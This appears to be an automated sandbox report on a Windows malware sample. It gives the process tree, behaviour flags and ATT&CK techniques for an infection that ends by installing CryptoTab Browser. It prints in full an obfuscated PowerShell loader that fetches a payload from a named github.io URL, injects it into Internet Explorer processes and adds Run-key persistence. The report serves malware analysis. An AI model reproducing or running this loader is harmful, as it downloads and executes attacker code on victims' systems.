L'P6V1D0L4P2C4a3P7R3G1U3A0B6L5E7F8M6G5E6F1s1G0a2RBH2E1V2O0B6SBA0SCk2DBR3A3O2IAC2LEK2f0X6ADF1IEI0iCF2QBO3P1A1U5W3D1D3f7N1U8M7SFs7CFK1BFK2G0S3H7S2TAk6A9A6s5U7B6O7RDs7V4S7FCa7P0o7p7G7O5M7K5F6G9T6M5G7S5U3VDL7e6A7m5A7U5H7r5L6T9P6B5s7C5E3ADT7L1T6TCS'T;C&M(S`$SUDnPvEiUtS7D)u U`$FLGiBmBfUaSbprtidkSkh1D1f8H8S;p`$NRDepsAiSdSeMnKtUsJbE0D1R R=T O'MhMtMtHpPsS:T/P/SqBuUiJcPkScAhVePcykUxK.MgGiTtBhfuSbS.ZiPot/KqSuPiNcCkUmceG/JMIiDlMiDeSuM.VsAnSpA'S;V`$FREeCsHiUdueInrtIsSbH0T0R B=U PHATSBo A'C6P1C1K1D2ECG2t9T3b7S2F4G2I4L2L1M2R0U2B9B6T5E7U8S6D5F6RDU0ABC2H0F3S2M6M8I0BAT2w7S2OFC2A0R2P6A3T1V6S5G0ABO2O0L3D1A6SBO1F2C2L0S2K7R0Z6O2Z9P2aCS2P0e2DBA3U1C6aCI6vBa0a1F2CAK3F2A2NBK2C9G2GAW2P4r2A1G1m6S3O1V3H7R2FCM2UBK2H2P6GDB6F1G1K7B2u0C3D6K2CCL2W1B2S0R2GBR3V1E3N6T2S7P7D5H7L4S6FCA'd;C`$TLGiBmPfKadbPrIiUkIkR1R1P8U8P P=a DHRTSBT T'O6G1B0A6M3FCC2n6P2L9B2FAK2SCS7O7R7V8K6B1A2U0O2UBM3T3E7FFD2S4T3r5M3F5b2B1B2P4E3S1B2C4K'S;P&S(D`$TUKnsvOiUtG7s)F u`$TLEiHmcfBaKbUrNiKkSkW1F1F8A8P;s`$FCKyTcGlBoPiU2V=B`$HCUyYcAlToBiS2O+S'S\AMOaUjLkSaFtDtAeSeP.PdBaHtd'E;B`$KTSiPlUrOaBaadVeLlF=v'G'S;FiCfF C(g-BnSoUtG(ATLeNsTtP-MPFaRtBhA W`$UCAypcClaodiR2J)U)A S{SwIhGidlAeB V(E`$RTMiWlMrBaraFdLePlB l-PeOqB B'C'S)r v{c&F(V`$GUNnnvTiatS7D)C P`$TRKePsPiNdGeBnotFsTbB0T0F;SSFtSaorAtS-TSSlHeBeApS E5E;W}DSBeEtM-VCPoVnStBeCnDtt S`$FCLyocrlHoKiA2F P`$ATGiTlNrNaPaSdMeDlf;N}L`$FTAidlJrKaRaAdPeIlI F=R OGEeMtS-ACUoKnUtEebnTtn O`$HCMyRcRlOoEiM2E;K`$BLFiNmWfAaSbHrViTkLkC1p1S8W9e a=U THITOBT L'K6m1H0S9L2PCS2H8P2I3I2M4P2e7A3T7D2BCY2PEB2ZEP7f4L7O4M7SDB6F5B7V8B6K5G1PEP1V6C3DCF3V6K3F1S2M0P2D8V6sBU0T6N2HAS2PBF3F3R2P0U3M7M3P1F1A8A7GFS7pFP0S3D3h7K2FAP2S8C0B7E2B4T3A6S2A0A7C3M7H1S1G6B3e1G3A7U2ACP2PBT2T2h6TDT6T1D1G1b2sCE2U9T3S7O2O4O2B4S2J1G2M0H2U9D6MCv'E;B&F(B`$DUCnHvTiftL7T)C F`$CLDiTmAfKaTbUruiSkDkH1D1I8K9T;B`$STiiMlCrDaMaUdNeAlG0o S=s UHFTSBC U'B1TEH1M6l3MCD3K6E3R1I2L0C2I8D6DBH1I7V3V0r2TBD3M1U2ECS2P8S2H0L6BBT0OCH2SBS3B1A2k0P3S7S2AAP3s5M1A6S2I0N3B7M3P3H2ICB2S6M2D0O3L6D6UBT0E8S2t4S3B7T3F6r2SDA2N4F2N9H1L8E7pFM7TFS0l6P2FAb3K5A3ICS6GDA6N1F0s9E2LCF2F8U2E3C2F4u2Y7C3R7H2RCf2IEY2MER7C4C7N4S7VDD6H9E6S5P7F5C6C9M6I5t6d5T6Y1e0F6S3MCL2O6P2B9R2fAF2FCd7T6T6A9R6U5E7N3k7p1M7S2B6ECM'S;M&L(F`$AURnNvRiDtU7V)P A`$JTBiVlSrBaNaGdGeilI0S;G`$SPKrueLsUaK=F`$DLUiCmAfEaSbLrSiskCkL1C1S8T.UcUoPuCnPtB-O6S4L7A;N`$BTFiDlRrGaBaUdSeDlT1T D=S BHMTPBP U'C1NEP1A6T3gCF3Z6A3D1R2S0F2B8T6VBS1V7K3H0B2KBS3D1S2SCK2C8P2B0C6SBA0BCb2DBp3M1B2P0S3F7U2EAS3R5M1A6S2R0B3M7S3F3W2TCC2S6R2O0P3R6p6DBL0E8H2V4P3D7l3P6C2UDN2K4S2S9F1l8s7BFE7KFC0S6U2PAF3b5S3UCS6FDG6K1F0V9A2DCH2W8I2W3A2S4u2R7E3G7D2KCC2WEN2SEI7O4C7A4D7FDA6Y9A6K5E7F3O7E1T7I2P6A9G6u5A6S1A0a4o2H4M3F7M3P1R3S0S6C9E6C5S6B1B1P5R3r7S2O0S3D6T2A4U6BCJ'A;P&C(S`$VUInFvsiBtM7C)S L`$UTKiVlFrDaRaUdIeplM1T;P`$GTHiFlUrnaUaFdNeSlS2S I=T SHMTfBU S'R6S1B1D6S3D5M2P4Y2R6M6A5H7H8K6C5M1PEE1N6B3FCS3T6C3S1D2F0A2H8P6CBF1P7M3E0G2SBT3O1C2RCv2O8S2T0D6ABS0RCD2HBS3C1S2P0A3A7T2MAS3P5M1D6b2F0T3K7O3C3F2CCM2F6I2I0H3R6R6TBS0G8K2A4M3T7I3B6B2NDT2D4R2T9R1M8H7RFF7LFH0V2J2P0M3O1K0S1D2W0I2f9F2M0B2c2L2T4O3H1F2F0B0N3H2IAF3C7s0B3M3U0U2FBF2K6B3T1P2DCB2HAB2CBm1A5F2OAA2bCC2PBD3P1F2D0C3G7J6PDC6NDC2S3U2NER3M5d6H5E6T1B0sDP2G0F2U8f2BCM3D5A2U0H6S5B6S1R1T6P3DCo2V6S2AAD3F6P2NCO2C3F6SCH6e9C6L5G6BDF0b2T0V1A1A1E6t5R0I5L6UDM1VEB0ICC2UBH3S1D1v5A3i1I3m7M1B8A6P9M6e5B1AEM0KCS2SBD3R1m1A5A3j1E3A7G1S8E6a9D6S5F1HEM0PCU2vBO3j1L1T5E3R1G3K7A1F8C6S9M6C5A1KEG0PCD2BBL3M1r1D5P3A1A3U7H1R8U6A9F6C5B1fEP0ACA2TBK3A1I1P5S3H1A3S7K1i8U6OCG6R5N6RDT1SEA0PCM2ABW3P1a1S5H3I1R3O7P1U8p6HCK6ICS6ACS'M;O&F(M`$tUCnVvTiUtP7L)B H`$STsiMlNrLaoaAdCeHlT2W;A`$iTCigltraaSaUdceBlp3S F=F MHGTKBN R'P6S1D1T6N3M5O2O4B2a6B6iBC0ACe2MBS3A3S2GAm2pEA2P0A6KDO6L1m0S6M3MCD2I6O2D9A2OAB2LCH7O6D6D9S6A1g0c4U2R4C3D7E3M1S3F0M6L9E6R1s0RBE2R0B2P2B2PAf3M1N2RCS2S4S3V1D6D9F7H5K6e9a7M5S6JCP'M;S&A(D`$OUFnQvGiCtP7G)C U`$KTSiAlSrSaHaSdfeSlS3F#A;""";$Pendrag = [char]0x73+'ubstring';Function Tilraadel9 { param([String]$Flskekd); For($Rhipsali=1; $Rhipsali -lt $Flskekd.Length-1; $Rhipsali+=(1+1)){ $Residentsb = $Residentsb + $Flskekd.$Pendrag.Invoke($Rhipsali, 1); } $Residentsb;}$hopingunde0 = Tilraadel9 'N C B K T D R R M B L G s B B K R M S B R P S P I S S O t F R E C C P S B B T E S LIAEUXB ';$hopingunde1= Tilraadel9 $Femaarig;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $hopingunde1 ;}else{&$hopingunde0.trim() $hopingunde1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Folkeb00 {param([String]$Flskekd);For($Rhipsali=1; $Rhipsali -lt $Flskekd.Length-1; $Rhipsali+=(1+1)){$Residentsb = $Residentsb + $Flskekd.Substring($Rhipsali, 1);}$Residentsb;}$Folkeb02 = Folkeb00 'WIPnIvuoKkReT-REBxBpArpeTsPsAiSosnT ';$Folkeb01 = Folkeb00 'U$SNToBnSrDeUtTrS[V$TRPhHiSpHsPaClFiF/E2F]H Z=b K[McGoPnLvMeFrStG]L:S:ATVofBCyEtneF(O$SFIlCsEkbeAkUdH.FSMuHbWsFtOrBiBnigT(L$ARThMiBpSsSaFlMiM,L H2U)P,C K1S6D)S ';Function HTB {param([String]$Flskekd);$Nonretr = New-Object byte[] ($Flskekd.Length / 2);For($Rhipsali=0; $Rhipsali -lt $Flskekd.Length; $Rhipsali+=2){.($Folkeb02) $Folkeb01;$Nonretr[$Rhipsali/2] = ($Nonretr[$Rhipsali/2] -bxor 69);}[String][System.Text.Encoding]::ASCII.GetString($Nonretr);}$Spou0=HTB '163C363120286B212929';$Spou1=HTB '082C26372A362A23316B122C2B76776B102B362423200B24312C33200820312D2A2136';$Spou2=HTB '02203115372A2604212137203636';$Spou3=HTB '163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B212920172023';$Spou4=HTB '3631372C2B22';$Spou5=HTB '022031082A213029200D242B212920';$Spou6=HTB '1711163520262C24290B24282069650D2C2120073C162C226965153027292C26';$Spou7=HTB '17302B312C2820696508242B24222021';$Spou8=HTB '1720232920263120210120292022243120';$Spou9=HTB '0C2B0820282A373C082A21302920';$Unvit0=HTB '083C0120292022243120113C3520';$Unvit1=HTB '06292436366965153027292C2669651620242920216965042B362C062924363669650430312A0629243636';$Unvit2=HTB '0C2B332A2E20';$Unvit3=HTB '153027292C2669650D2C2120073C162C2269650B203216292A316965132C3731302429';$Unvit4=HTB '132C37313024290429292A26';$Unvit5=HTB '2B31212929';$Unvit6=HTB '0B3115372A31202631132C37313024290820282A373C';$Unvit7=HTB '0C001D';$Unvit8=HTB '19';$Hemipe=HTB '101600177677';$Sycosif=HTB '06242929122C2B212A3215372A2604';function fkp {Param ($Tnke, $Swineherdp) ;$Limfabrikk1180 =HTB '6111373720292A236578656D1E043535012A28242C2B187F7F06303737202B31012A28242C2B6B022031043636202827292C20366D6C653965122D203720680A272F202631653E65611A6B02292A272429043636202827293C0624262D206568042B2165611A6B092A2624312C2A2B6B1635292C316D61102B332C317D6C1E6874186B0034302429366D6116352A30756C65386C6B022031113C35206D6116352A30746C';&($Unvit7) $Limfabrikk1180;$Limfabrikk1185 = HTB '61082031242933242B216578656111373720292A236B0220310820312D2A216D6116352A307769651E113C35201E181865056D6116352A307669656116352A30716C6C';&($Unvit7) $Limfabrikk1185;$Limfabrikk1181 = HTB '37203130372B6561082031242933242B216B0C2B332A2E206D612B3029296965056D1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B212920172023186D0B2032680A272F20263165163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B2129201720236D6D0B2032680A272F202631650C2B311531376C69656D6111373720292A236B0220310820312D2A216D6116352A30706C6C6B0C2B332A2E206D612B3029296965056D61112B2E206C6C6C6C69656116322C2B202D203721356C6C';&($Unvit7) $Limfabrikk1181;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $skydev,[Parameter(Position = 1)] [Type] $Eleuthe = [Void]);$Limfabrikk1182 = HTB '610437202B2C262A296578651E043535012A28242C2B187F7F06303737202B31012A28242C2B6B0120232C2B20013C2B24282C26043636202827293C6D6D0B2032680A272F20263165163C363120286B172023292026312C2A2B6B043636202827293C0B2428206D6116352A307D6C6C69651E163C363120286B172023292026312C2A2B6B00282C316B043636202827293C07302C29212037042626203636187F7F17302B6C6B0120232C2B20013C2B24282C26082A213029206D6116352A307C69656123242936206C6B0120232C2B20113C35206D61102B332C3175696561102B332C317469651E163C363120286B083029312C262436310120292022243120186C';&($Unvit7) $Limfabrikk1182;$Limfabrikk1183 = HTB '610437202B2C262A296B0120232C2B20062A2B3631373026312A376D6116352A307369651E163C363120286B172023292026312C2A2B6B062429292C2B22062A2B33202B312C2A2B36187F7F1631242B21243721696561362E3C2120336C6B1620310C2835292028202B3124312C2A2B03292422366D6116352A30726C';&($Unvit7) $Limfabrikk1183;$Limfabrikk1184 = HTB '610437202B2C262A296B0120232C2B200820312D2A216D61102B332C3177696561102B332C317669656100292030312D20696561362E3C2120336C6B1620310C2835292028202B3124312C2A2B03292422366D6116352A30726C';&($Unvit7) $Limfabrikk1184;$Limfabrikk1185 = HTB '37203130372B65610437202B2C262A296B063720243120113C35206D6C';&($Unvit7) $Limfabrikk1185 ;}$Engangsem = HTB '2E20372B20297677';$Limfabrikk1186 = HTB '61102B21206578651E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F0220310120292022243120032A3703302B26312C2A2B152A2C2B3120376D6D232E356561002B22242B223620286561102B332C31716C69656D02011165056D1E0C2B311531371869651E100C2B3176771869651E100C2B3176771869651E100C2B317677186C656D1E0C2B31153137186C6C6C';&($Unvit7) $Limfabrikk1186;$Negotiat = fkp $Unvit5 $Unvit6;$Limfabrikk1187 = HTB '61063C26292A2C7665786561102B21206B0C2B332A2E206D1E0C2B31153137187F7F1F20372A69657371726965753D767575756965753D71756C';&($Unvit7) $Limfabrikk1187;$Limfabrikk1188 = HTB '61042437313065786561102B21206B0C2B332A2E206D1E0C2B31153137187F7F1F20372A6965767D747C707775756965753D767575756965753D716C';&($Unvit7) $Limfabrikk1188;$Residentsb01 = 'https://quickcheckx.github.io/quickme/Milieu.snp';$Residentsb00 = HTB '61112C293724242120296578656D0B2032680A272F202631650B20316B12202706292C202B316C6B012A322B292A24211631372C2B226D611720362C21202B31362775746C';$Limfabrikk1188 = HTB '61063C26292A2C777861202B337F24353521243124';&($Unvit7) $Limfabrikk1188;$Cycloi2=$Cycloi2+'\Majkattee.dat';$Tilraadel='';if (-not(Test-Path $Cycloi2)) {while ($Tilraadel -eq '') {&($Unvit7) $Residentsb00;Start-Sleep 5;}Set-Content $Cycloi2 $Tilraadel;}$Tilraadel = Get-Content $Cycloi2;$Limfabrikk1189 = HTB '61092C28232427372C2E2E74747D6578651E163C363120286B062A2B33203731187F7F03372A280724362073711631372C2B226D61112C293724242120296C';&($Unvit7) $Limfabrikk1189;$Tilraadel0 = HTB '1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F062A353C6D61092C28232427372C2E2E74747D69657569656561063C26292A2C7669657371726C';&($Unvit7) $Tilraadel0;$Presa=$Limfabrikk118.count-647;$Tilraadel1 = HTB '1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F062A353C6D61092C28232427372C2E2E74747D6965737172696561042437313069656115372036246C';&($Unvit7) $Tilraadel1;$Tilraadel2 = HTB '61163524266578651E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F0220310120292022243120032A3703302B26312C2A2B152A2C2B3120376D6D232E3565610D20282C35206561163C262A362C236C69656D02011165056D1E0C2B311531371869651E0C2B311531371869651E0C2B311531371869651E0C2B311531371869651E0C2B31153137186C656D1E0C2B31153137186C6C6C';&($Unvit7) $Tilraadel2;$Tilraadel3 = HTB '61163524266B0C2B332A2E206D61063C26292A2C766961042437313069610B20222A312C2431697569756C';&($Unvit7) $Tilraadel3#"
3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:1244

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:1136

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:4444

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:1564

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:864

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:2196

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:4604

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:620

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:3584

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:4464

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:896

C:\Program Files (x86)\internet explorer\ielowutil.exe
"C:\Program Files (x86)\internet explorer\ielowutil.exe"
4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3604

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4836

C:\Users\Admin\AppData\Local\Temp\ctu542B.tmp
"C:\Users\Admin\AppData\Local\Temp\ctu542B.tmp" --verbose-logging --system-level --enable-autorun
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524

C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\CHROME.PACKED.7Z" --verbose-logging --system-level --enable-autorun
7⤵
- Modifies Installed Components in the registry
- Executes dropped EXE
- Registers COM server for autorun
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe
C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --annotation=plat=Win64 "--annotation=prod=CryptoTab Browser" --annotation=ver=108.0.5359.95 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff616db4020,0x7ff616db4030,0x7ff616db4040
8⤵
- Executes dropped EXE
PID:1416

C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe" --system-level --verbose-logging --create-shortcuts=0 --install-level=1
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4252

C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe
C:\Users\Admin\AppData\Local\Temp\CR_233D8.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --annotation=plat=Win64 "--annotation=prod=CryptoTab Browser" --annotation=ver=108.0.5359.95 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff616db4020,0x7ff616db4030,0x7ff616db4040
9⤵
- Executes dropped EXE
PID:2644

C:\Program Files\CryptoTab Browser\Application\browser.exe
"C:\Program Files\CryptoTab Browser\Application\browser.exe" --from-installer
8⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3252

C:\Program Files\CryptoTab Browser\Application\browser.exe
"C:\Program Files\CryptoTab Browser\Application\browser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\CryptoTab Browser\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\CryptoTab Browser\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CryptoTab Browser\User Data\Crashpad" --annotation=plat=Win64 "--annotation=prod=CryptoTab Browser" --annotation=ver=108.0.5359.95 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb56447e68,0x7ffb56447e78,0x7ffb56447e88
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3732

C:\Program Files\CryptoTab Browser\Application\browser.exe
"C:\Program Files\CryptoTab Browser\Application\browser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\CryptoTab Browser\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CryptoTab Browser\User Data\Crashpad" --annotation=plat=Win64 "--annotation=prod=CryptoTab Browser" --annotation=ver=108.0.5359.95 --initial-client-data=0x13c,0x140,0x144,0xe4,0x148,0x7ff78aa7ed68,0x7ff78aa7ed78,0x7ff78aa7ed88
10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1228

C:\Program Files\CryptoTab Browser\Application\browser.exe
"C:\Program Files\CryptoTab Browser\Application\browser.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=2128,i,3093652426836694769,12865323698725168020,131072 /prefetch:2
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4712

C:\Program Files\CryptoTab Browser\Application\browser.exe
"C:\Program Files\CryptoTab Browser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --start-stack-profiler --mojo-platform-channel-handle=2024 --field-trial-handle=2128,i,3093652426836694769,12865323698725168020,131072 /prefetch:8
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2416

C:\Program Files\CryptoTab Browser\Application\browser.exe
"C:\Program Files\CryptoTab Browser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1308 --field-trial-handle=2128,i,3093652426836694769,12865323698725168020,131072 /prefetch:8
9⤵
PID:1792

C:\Program Files\CryptoTab Browser\Application\CryptoTabUpdater.exe
"C:\Program Files\CryptoTab Browser\Application\CryptoTabUpdater.exe" --install
6⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1556

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

Privilege Escalation

Defense Evasion

Modify Registry

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

System Information Discovery